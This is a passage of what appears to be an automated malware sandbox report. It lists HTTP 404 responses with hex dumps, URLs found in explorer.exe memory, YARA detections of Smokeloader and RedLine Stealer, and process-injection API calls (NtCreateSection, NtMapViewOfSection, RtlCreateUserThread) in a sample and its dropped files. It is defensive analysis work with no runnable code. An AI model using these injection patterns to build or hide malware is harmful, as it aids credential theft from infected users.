server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:29:13 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:29:14 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:29:15 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:30:26 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:30:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:30:41 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:30:52 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:31:05 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:31:20 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:31:35 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:31:50 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:32:05 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: explorer.exe, 00000001.00000000.1806362618.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1808911051.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
    Source: explorer.exe, 00000001.00000000.1806362618.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1808911051.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
    Source: explorer.exe, 00000001.00000000.1806362618.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1808911051.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
    Source: explorer.exe, 00000001.00000000.1806362618.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1808911051.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
    Source: explorer.exe, 00000001.00000000.1806362618.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
    Source: explorer.exe, 00000001.00000000.1809694826.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1808417932.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1807989575.0000000007F40000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
    Source: explorer.exe, 00000001.00000000.1811007850.000000000C964000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
    Source: explorer.exe, 00000001.00000000.1811007850.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
    Source: explorer.exe, 00000001.00000000.1806362618.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
    Source: explorer.exe, 00000001.00000000.1806362618.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
    Source: explorer.exe, 00000001.00000000.1811007850.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
    Source: explorer.exe, 00000001.00000000.1808911051.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
    Source: explorer.exe, 00000001.00000000.1808911051.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
    Source: explorer.exe, 00000001.00000000.1805481373.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1804862887.0000000001248000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
    Source: explorer.exe, 00000001.00000000.1808911051.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
    Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
    Source: explorer.exe, 00000001.00000000.1808911051.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
    Source: explorer.exe, 00000001.00000000.1808911051.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
    Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
    Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
    Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
    Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
    Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
    Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
    Source: explorer.exe, 00000001.00000000.1806362618.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
    Source: explorer.exe, 00000001.00000000.1806362618.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
    Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
    Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
    Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
    Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
    Source: explorer.exe, 00000001.00000000.1811007850.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
    Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
    Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
    Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
    Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
    Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
    Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
    Source: explorer.exe, 00000001.00000000.1806362618.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
    Source: explorer.exe, 00000001.00000000.1811007850.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
    Source: explorer.exe, 00000001.00000000.1811007850.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
    Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
    Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
    Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
    Source: explorer.exe, 00000001.00000000.1811007850.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
    Source: explorer.exe, 00000001.00000000.1811007850.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
    Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
    Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
    Source: explorer.exe, 00000001.00000000.1806362618.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
    Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
    Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
    Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
    Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
    Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
    Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
    Source: explorer.exe, 00000001.00000000.1806362618.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
    Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
    Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
    Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
    Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
    Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
    Source: explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
    Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
    Source: unknownHTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.4:49779 version: TLS 1.2

    Key, Mouse, Clipboard, Microphone and Screen Capturing

    barindex
    Source: Yara matchFile source: 00000005.00000002.2089545393.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000002.2686854364.0000000002E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000006.00000002.2387169374.0000000002C21000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.1818628832.0000000002D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.1818859603.0000000002EF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000002.2687018881.0000000003001000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000006.00000002.2387127676.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000005.00000002.2089499262.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

    System Summary

    barindex
    Source: 00000005.00000002.2089545393.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000008.00000002.2686603157.0000000002C37000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 00000006.00000002.2387106180.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
    Source: 00000008.00000002.2686820373.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
    Source: 00000005.00000002.2089476769.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
    Source: 00000008.00000002.2686854364.0000000002E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000005.00000002.2089645639.0000000002D57000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 00000006.00000002.2387169374.0000000002C21000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000000.00000002.1818628832.0000000002D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000000.00000002.1818742060.0000000002DB7000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 00000006.00000002.2387276728.0000000002C67000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 00000000.00000002.1818859603.0000000002EF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000008.00000002.2687018881.0000000003001000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000000.00000002.1818600751.0000000002D80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
    Source: 00000006.00000002.2387127676.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000005.00000002.2089499262.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401514
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402F97 RtlCreateUserThread,NtTerminateProcess,0_2_00402F97
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401542
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00403247 NtTerminateProcess,GetModuleHandleA,0_2_00403247
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401549
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040324F NtTerminateProcess,GetModuleHandleA,0_2_0040324F
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00403256 NtTerminateProcess,GetModuleHandleA,0_2_00403256
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401557
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040326C NtTerminateProcess,GetModuleHandleA,0_2_0040326C
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00403277 NtTerminateProcess,GetModuleHandleA,0_2_00403277
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014FE
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00403290 NtTerminateProcess,GetModuleHandleA,0_2_00403290
    Source: C:\Users\user\AppData\Roaming\trbwcitCode function: 5_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401514
    Source: C:\Users\user\AppData\Roaming\trbwcitCode function: 5_2_00402F97 RtlCreateUserThread,NtTerminateProcess,5_2_00402F97
    Source: C:\Users\user\AppData\Roaming\trbwcitCode function: 5_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401542
    Source: C:\Users\user\AppData\Roaming\trbwcitCode function: 5_2_00403247 NtTerminateProcess,GetModuleHandleA,5_2_00403247
    Source: C:\Users\user\AppData\Roaming\trbwcitCode function: 5_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401549
    Source: C:\Users\user\AppData\Roaming\trbwcitCode function: 5_2_0040324F NtTerminateProcess,GetModuleHandleA,5_2_0040324F
    Source: C:\Users\user\AppData\Roaming\trbwcitCode function: 5_2_00403256 NtTerminateProcess,GetModuleHandleA,5_2_00403256
    Source: C:\Users\user\AppData\Roaming\trbwcitCode function: 5_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401557
    Source: C:\Users\user\AppData\Roaming\trbwcitCode function: 5_2_0040326C NtTerminateProcess,GetModuleHandleA,5_2_0040326C
    Source: C:\Users\user\AppData\Roaming\trbwcitCode function: 5_2_00403277 NtTerminateProcess,GetModuleHandleA,5_2_00403277
    Source: C:\Users\user\AppData\Roaming\trbwcitCode function: 5_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_004014FE
    Source: C:\Users\user\AppData\Roaming\trbwcitCode function: 5_2_00403290 NtTerminateProcess,GetModuleHandleA,5_2_00403290
    Source: C:\Users\user\AppData\Local\Temp\565.exeCode function: 6_2_00403103 RtlCreateUserThread,NtTerminateProcess,6_2_00403103
